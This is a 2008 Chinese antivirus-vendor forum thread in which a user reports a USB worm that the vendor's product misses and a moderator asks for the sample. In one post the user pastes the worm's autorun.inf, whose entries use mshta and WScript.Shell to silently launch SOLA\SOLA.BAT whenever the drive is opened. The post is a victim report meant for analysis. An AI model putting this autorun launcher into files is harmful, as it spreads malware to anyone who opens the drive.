微点交流论坛
» 游客:  注册 | 登录 | 帮助

 微点交流论坛 » 微点软件使用交流 » 过微点,删不掉的病毒  

作者:
标题: 过微点,删不掉的病毒
bassly
新手上路





积分 23
发帖 23
注册 2007-9-3
#1  过微点,删不掉的病毒

很简单的一个病毒,也许是针对微点的,dr.web的cureit.exe能查出来,但是杀完了又有,微点一点反应都没有。汗!
样本传不上来!!!

※ ※ ※ 本文纯属【bassly】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2008-7-27 10:43
查看资料  发短消息   编辑帖子
bassly
新手上路





积分 23
发帖 23
注册 2007-9-3
#2  

通过Autorun.inf传播,还有一个叫做sola的文件夹,里面有几个文件!

SOLA_1.0
[autorun]
shell\打开(&O)\command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
shell=打开(&O)
shell\open=复制磁盘(&C)
shell\open\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"

※ ※ ※ 本文纯属【bassly】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2008-7-27 10:46
查看资料  发短消息   编辑帖子
bassly
新手上路





积分 23
发帖 23
注册 2007-9-3
#3  

我们反应神速的超版哪去了?救命呀

※ ※ ※ 本文纯属【bassly】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2008-7-27 10:55
查看资料  发短消息   编辑帖子
Legend
超级版主

超级版主



积分 77171
发帖 70170
注册 2005-10-29
#4  

请问具体是什么文件?请楼主将样本以及微点的技术支持信息(辅助功能->生成技术支持信息)发送到 virus@Micropoint.com.cn 邮箱,并简要说明情况,我们具体测试分析后将给您回复。谢谢您的反馈。

发送后请将您的邮箱地址通过论坛短消息发给我,便于我们及时跟踪处理。

※文章所有权归【Legend】与【东方微点论坛】共同所有,转载请注明出处!※

微点官方认证新浪微博:欢迎进入 微点新浪微博
微点技术支持邮箱: support@micropoint.com.cn
给Legend发短消息
2008-7-27 10:58
查看资料  发短消息   编辑帖子
bassly
新手上路





积分 23
发帖 23
注册 2007-9-3
#5  

谢谢版主,我现在在用另外一台计算机,提取了样本,可以发文件吗?

※ ※ ※ 本文纯属【bassly】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2008-7-27 11:00
查看资料  发短消息   编辑帖子
bassly
新手上路





积分 23
发帖 23
注册 2007-9-3
#6  

刚在在卡饭有人说能够拦截了,但哪台机子是在中毒以后装的微点。没有提示

※ ※ ※ 本文纯属【bassly】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2008-7-27 11:03
查看资料  发短消息   编辑帖子
bassly
新手上路





积分 23
发帖 23
注册 2007-9-3
#7  

样本已经发过去了

※ ※ ※ 本文纯属【bassly】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2008-7-27 11:09
查看资料  发短消息   编辑帖子



论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏


[ 联系我们 - 东方微点 ]

北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司

闽ICP备05030815号